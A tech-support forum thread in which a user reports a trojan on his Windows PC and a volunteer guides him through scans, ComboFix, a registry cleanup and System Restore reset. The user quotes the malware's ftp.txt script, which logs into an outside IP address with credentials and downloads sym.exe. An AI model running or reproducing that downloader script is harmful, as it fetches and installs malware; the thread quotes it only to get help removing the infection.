Help with Trojan.small.f

1417 Views 8 Replies 2 Participants Last post by  Ried
A couple of days ago, I noticed that Zonealarm was blocking an outgoing internet access attempt by ftp.exe. Scans by AdAware and Spybot S&D found nothing so I installed and ran the AVG Antispyware 7.5. It found a file located in my Symantec Antivirus folder named iget.vbe and identified it as "trojan.small.f" and promptly quarantined it. I also noticed a file in the same folder called ftp.txt with the following contents:

open 60.187.128.104
cool
123456xc
get sym.exe
bye

Even with the iget.vbe quarantined, I continue to get outgoing internet access attempts (this time by Trivial FTP - tfpt.exe) blocked by ZoneAlarm and also received a windows popup dialog stating that "windows cannot find symtea.exe". I then found a utility called ProcessExplorer and had it running when tftp.exe made an attempt to connect to the internet. ProcessExplorer appears to show that rtvscan.exe was originating the attempt (see log file below):

I have searched far and wide for any information for this behavior and have not been able to find anything. Suspecting something with rtvscan.exe I even submitted it to several online virus scanners (via virustotal.com) and found nothing. Any help in resolving this problem would be greatly appreciated. I forgot to mention that during the time when all of this was going on windows reported several buffer overrun errors on rtvscan.exe.

Hello hmiller8 and welcome to TSF,

Thank you for your patience. rtvscan.exe is an executable of the Symantec Internet Security Suite. It is responsible for the execution of real-time virus-scanning in order to detect virus infected files as they enter your system.

tftp.exe is a normal process associated with Microsoft® Windows® Operating System from Microsoft Corporation--but it can be used by worms.

I'm not seeing anything in your HijackThis log. I'd like to run a couple tools and see if any malware is revealed.

Please run this online scan to search for any remnants. It can take some time, so please be patient and allow it to run it's full course:

Perform an online scan with Internet Explorer with Panda ActiveScan
  1. Click on
located at the bottom of the page.
  2. A "pop up" window will appear. * Please ensure that your pop up blocker doesn't block it *
  3. Enter your e-mail address, country, and state & click "Free Online Scan" *The download of the 8 MB Panda's ActiveX control will take place*
Begin the scan by selecting
  • If it finds any malware, it will offer you a report.
  • Please ignore any entry it finds and the offer to buy the program to remove the entry, as we will address this later.
  • Click on
    then click
* You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report.
* Turn off the real time scanner of any existing antivirus program while performing the online scan

Download Combofix and save it to your desktop.

**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

Close any open browsers.

--------------------------------------------------------------------

Double click on combofix.exe & follow the prompts.
When finished, it shall produce a log for you.

Note:
Do not mouseclick combofix's window whilst it's running. That may cause it to stall

Post the ComboFix.txt in your next reply.

Ried,
Thanks for your reply. Before I run your requested scans, I have a couple of things to report and a couple of questions. First, following some of the information that I found on this site, I turned off system restore, booted up in safe mode and deleted everything from my temporary internet files folder. This appears to have stopped the requests for internet access from ftp and tftp. Additionally, I completely removed Symantec Antivirus and reinstalled a newer version (SAV 10.1 - old version was 10.0). I have not turned system restore back on and that is a question I have. Do I turn it back on before I run the scans or does it matter? My problem seems to be resolved but I am interested in following through with your suggestions just to be sure. I'll wait to hear back from you before I take action. Thanks again for your assistance.

Hank
Hello Hank,

Yes, turn System Restore back on before you continue so you have a 'fall back' point. Should we find and remove any malware, we'll flush the restore point once again.
Reid,
Here are the logs you requested. One note. I ran the Panda scan before I got your reply about turning system restore back on and then ran it again after your reply. The first time it found the Virus:trj/downloader.coy and reported that it had been disinfected (I'm posting the first log so you can see it). The next time (after I turned on system restore), that entry did not show up. Any concern with that? Thanks again, Hank.

Hello Hank,

No concerns--Panda apparently did effectively disinfect that entry.

I see you do have AVG Anti Spyware. I'd like you to run it to clear out those cookies reported by Panda. An alternative method would be to clear all cookies using IE>Tools>Internet Options, but that would clear all cookies--even good ones.

It's best to run AVG A-S in Safe Mode, so please reboot into Safe Mode.

--------------------------------------------------------------------

IMPORTANT: Do not open any other windows or programs while AVG Anti-Spyware is scanning, it may interfere with the scanning proccess:
Run AVG Anti-Spyware with it's updated definitions:(...it's important that all windows must be closed)
  • Click Scanner
  • Click on the Scan tab
  • Click Complete System Scan to begin scanning.
Once the scan is complete do the following:
  • If you have any infections you will prompted, **Please ensure it is set to Quarantine then select "Apply all actions"
  • Once finished, click the Save report button, then click Save Report As and save it to your desktop. (make sure to remember where you saved that file, this is important).
--------------------------------------------------------------------

Go to Start->Run and type in regedit and hit OK. Go to File->Export and save the registry somewhere as a backup. Close the Registry Editor now.

Open notepad and copy/paste the text in the quotebox below:
(don't forget to copy and paste REGEDIT4)

REGEDIT4

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}]

Save the file as "delete.reg". Make sure to save it with the quotes. Choose to "Save type as - All Files"
It should look like this:

Double click on the delete.reg file and choose Yes to merge/add it to the registry. You may delete the file afterwards.

--------------------------------------------------------------------

Reboot into Normal Mode.

--------------------------------------------------------------------

How is your system behaving now?

Reid,
Thanks again for your time and assistance. I performed all of your actions. I guess between those and what I did before, things seem to be back to normal. If you think things look good, then I'm happy. I guess we can consider this "case closed." If anything pops up in the future, I will definitely use this forum again.

thanks,
Hank
Hello Hank,

Well...if there aren't any more problems, please continue with these final instructions and helpful links.

Your logs are clean. If there aren't any more problems, please continue with these final instructions and helpful links.

Create a new System Restore point
Click Start >> Run - type SYSDM.CPL & press Enter
* Select the System Restore Tab
* Tick on the checkbox - "Turn off System Restore on all drives"
Click Apply
* Then untick the same checkbox & click OK
This will prevent any reinfection from previous restore points.

To help protect your computer in the future I recommend that you get the following free programs if you do not already have them:

Download SpywareBlaster 3.5.1 to help prevent spyware from installing in the first place. Install & update SpywareBlaster with the latest definitions. After you have updated, click the button - enable protection for all unprotected items.

Download Spyware Guard to catch and block spyware before it can execute.

Download IE-SPYAD.EXE to block access to malicious websites so you cannot be redirected to them from an infected site or email. IE/Spyad places more than 4000 dubious websites and domains in the IE Restricted list. This severely impairs attempts to infect your system. It basically prevents any downloads (Cookies etc) from the sites listed, although you will still be able to connect to the sites. This is a self-extracting .ZIP file, save it to your desktop. Once downloaded, double-click on it to extract the files inside (default dir is C:\IE-SPYAD)
  • Now navigate to C:\ie-spyad. Double click to open it.
  • From within the folder, double-click install.bat
  • Select Option #2 - Install the new IE-SPYAD list, by typing 2
  • Then return to the main menu.
  • Select option #4 - Add the old porn sites domain, by typing 4

Update all these programs regularly. Without regular updates you will not be protected when new malicious programs are released.

I'm sure you'd like to avoid any future infections. Please take a look at these well written articles:

**Be very wary with any security software that is advertised in popups or in other ways. They are not only usually of no use, but often have malware in them.

Follow this list and your potential for being infected will reduce dramatically.
